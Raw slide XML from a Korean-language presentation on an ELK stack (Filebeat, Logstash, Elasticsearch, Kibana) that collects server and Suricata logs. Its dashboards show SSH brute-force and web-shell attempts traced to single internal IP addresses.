            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9201607" y="6068170"/>
              <a:ext cx="2305202" cy="305410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9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서로 다른 로그를 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="9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Elastic Common Schema</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="9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로 통일하여 공격자 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="9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IP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="9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중심의 상관분석 효율성 증대</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="333223"/>
            <a:ext cx="2305202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ELK 수집 대상</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="74" name="그룹 73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="571500" y="1458874"/>
            <a:ext cx="5372100" cy="3928354"/>
            <a:chOff x="571500" y="2087386"/>
            <a:chExt cx="5372100" cy="4040242"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="571500" y="2087386"/>
              <a:ext cx="5372100" cy="4040242"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 241"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="94A3B8">
                  <a:alpha val="1000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Shape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="886054" y="2342926"/>
              <a:ext cx="38405" cy="304495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E5E7EB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Shape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="886054" y="3886433"/>
              <a:ext cx="4743907" cy="9144"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="94A3B8">
                <a:alpha val="2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8" name="Image 0" descr="preencoded.png"/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19556" y="3086333"/>
              <a:ext cx="190195" cy="190195"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Text 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1495044" y="2952831"/>
              <a:ext cx="4262933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13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Filebeat (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="13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수집</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="13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)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1300"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Text 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1495044" y="3257326"/>
              <a:ext cx="4234586" cy="438912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0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경량 로그 수집기로서 서버 내 산재된 로그 파일을 실시간으로 읽어드림</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Shape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="886054" y="5014803"/>
              <a:ext cx="4743907" cy="9144"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="94A3B8">
                <a:alpha val="20000"/>
              </a:srgbClr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2" name="Image 1" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId7"/>
            <a:srcRect l="-1280" r="-1280"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1004926" y="4214703"/>
              <a:ext cx="219456" cy="190195"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Text 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1495044" y="4081201"/>
              <a:ext cx="4262933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3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Logstash (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="13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가공</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="13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)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1300"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1495044" y="4386610"/>
              <a:ext cx="4234586" cy="438912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000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>수집된 원시 로그를 가공</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>필터링</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>변환하는 데이터 처리 파이프라인 엔진</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Image 2" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect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019556" y="5343073"/>
              <a:ext cx="190195" cy="190195"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Text 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1495044" y="5210485"/>
              <a:ext cx="4262933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3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Elasticsearch (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="13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적재</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="13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)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1300"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Text 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1495044" y="5514980"/>
              <a:ext cx="4234586" cy="438912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0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가공된 데이터를 인덱싱하여 대용량 저장 및 초고속 검색</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="10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/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="10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분석 환경 제공</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Text 41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1076249" y="2323724"/>
              <a:ext cx="2467051" cy="333756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8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주요 수집 로그 </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6334049" y="1458874"/>
            <a:ext cx="5372100" cy="3928354"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 29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572708" y="1749304"/>
            <a:ext cx="190195" cy="200031"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6877203" y="1708913"/>
            <a:ext cx="3648456" cy="28081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Kibana </a:t>
            </a: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시각화 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572708" y="2149367"/>
            <a:ext cx="4895698" cy="3007336"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 433"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581852" y="2239766"/>
            <a:ext cx="2564434" cy="721267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581852" y="2931313"/>
            <a:ext cx="1714500" cy="20195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3341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Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9146286" y="2239766"/>
            <a:ext cx="2238375" cy="721267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8289036" y="2931313"/>
            <a:ext cx="1714500" cy="20195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3341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Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9995307" y="2931313"/>
            <a:ext cx="1466698" cy="20195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3341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8" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581852" y="3726079"/>
            <a:ext cx="1714500" cy="9616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3341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Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8289036" y="3726079"/>
            <a:ext cx="1714500" cy="9616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3341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Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9995307" y="3726079"/>
            <a:ext cx="1466698" cy="9616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3341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25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581852" y="4458796"/>
            <a:ext cx="1714500" cy="9616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33415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6734556" y="4024111"/>
            <a:ext cx="133502" cy="140406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8289036" y="4458796"/>
            <a:ext cx="1714500" cy="9616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3341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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9995307" y="4458796"/>
            <a:ext cx="1466698" cy="9616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3341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6" name="Text 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934581" y="2474418"/>
            <a:ext cx="1023214" cy="22118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100" b="1">
                <a:solidFill>
                  <a:srgbClr val="22D3EE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>소스 (Source)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621928" y="2464753"/>
            <a:ext cx="1395146" cy="45103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100" b="1">
                <a:solidFill>
                  <a:srgbClr val="22D3EE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>수집기 (Agent/Input)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6972300" y="3145218"/>
            <a:ext cx="1729131" cy="430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기밀 문서 서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(</a:t>
            </a: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서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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웹 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ssh </a:t>
            </a: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접속 로그</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9574302" y="3211893"/>
            <a:ext cx="1170432" cy="430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filebeat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Text 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6944259" y="4024705"/>
            <a:ext cx="1570407" cy="32841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사내게시판</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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(mint) </a:t>
            </a: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서버</a:t>
            </a:r>
            <a:b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</a:br>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="E2E8F0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63" name="Text 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9574302" y="4020809"/>
            <a:ext cx="1074420" cy="430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filebeat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6982359" y="4719321"/>
            <a:ext cx="2037740" cy="19823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AWS</a:t>
            </a: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suricata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="10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탐지 로그 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="77" name="Image 5" descr="preencoded.png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6734556" y="3204961"/>
            <a:ext cx="133502" cy="140406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38924" y="4719321"/>
            <a:ext cx="271536" cy="198231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Text 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9583827" y="4725660"/>
            <a:ext cx="1074420" cy="430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filebeat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49323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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="952805"/>
            <a:ext cx="4673295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웹 서비스 및 인증 시스템을 대상으로 한 복합 공격 실시간 가시화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="390449"/>
            <a:ext cx="4558995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Kibana: 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사내게시판 서버</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688136" y="1547165"/>
            <a:ext cx="5785006" cy="4934102"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 42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22D3EE">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="1016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rcRect l="260" b="330"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="292099" y="1547165"/>
            <a:ext cx="6181041" cy="4955235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6818379" y="1547165"/>
            <a:ext cx="4992925" cy="1600388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5" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7580988" y="1822981"/>
            <a:ext cx="2220798" cy="36169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SSH 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접속 실패 </a:t>
            </a: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(Brute Force)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Text 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7142991" y="2312952"/>
            <a:ext cx="4263334" cy="74940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</a:rPr>
              <a:t>특정 외부 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</a:rPr>
              <a:t>IP (172.16.0.132)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</a:rPr>
              <a:t>로부터 단시간 내 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</a:rPr>
              <a:t>327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</a:rPr>
              <a:t>건의 비정상 접속 시도가 집중적으로 발생했음을 확인했습니다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</a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6818379" y="3329641"/>
            <a:ext cx="4992925" cy="1355128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1" name="Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7568287" y="3536640"/>
            <a:ext cx="2323769" cy="36169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웹쉘 및 홈페이지 로그인 기록</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7142990" y="3974998"/>
            <a:ext cx="4441948" cy="50414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10.0.0.134 IP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가 웹 서버를 대상으로 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31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건의 웹쉘 공격과 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7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건의 로그인 시도를 병행하며 다각도로 침입을 시도 중입니다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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6818380" y="4866856"/>
            <a:ext cx="4992926" cy="1600388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4" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800090" y="4866856"/>
            <a:ext cx="45719" cy="1600388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D39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5" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7180785" y="5072480"/>
            <a:ext cx="308210" cy="326432"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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6" name="Image 6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7238392" y="5145700"/>
            <a:ext cx="176271" cy="180848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7555588" y="5142672"/>
            <a:ext cx="2624004" cy="33348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공격 지표 시각화 및 분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7142991" y="5631404"/>
            <a:ext cx="4263334" cy="74940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수집된 로그 분석 결과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전체 공격의 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97.32%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가 단일 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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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에 의해 수행되고 있음을 직관적으로 파악 할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800090" y="3314281"/>
            <a:ext cx="45719" cy="1368702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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1" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7190310" y="3453230"/>
            <a:ext cx="308210" cy="326432"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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2" name="Image 6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7247917" y="3526450"/>
            <a:ext cx="176271" cy="180848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800090" y="1542631"/>
            <a:ext cx="45719" cy="1588415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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7" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161735" y="1672055"/>
            <a:ext cx="308210" cy="343613"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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8" name="Image 6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7219342" y="1754800"/>
            <a:ext cx="176271" cy="1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42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리소스 제한적 환경에서의 실시간 로그 분석 및 멀티 벡터 공격 대응</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="13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 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="390449"/>
            <a:ext cx="8572500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Kibana: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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기밀 문서 서버 </a:t>
            </a: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3"/>
          <a:srcRect t="1840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="1774749"/>
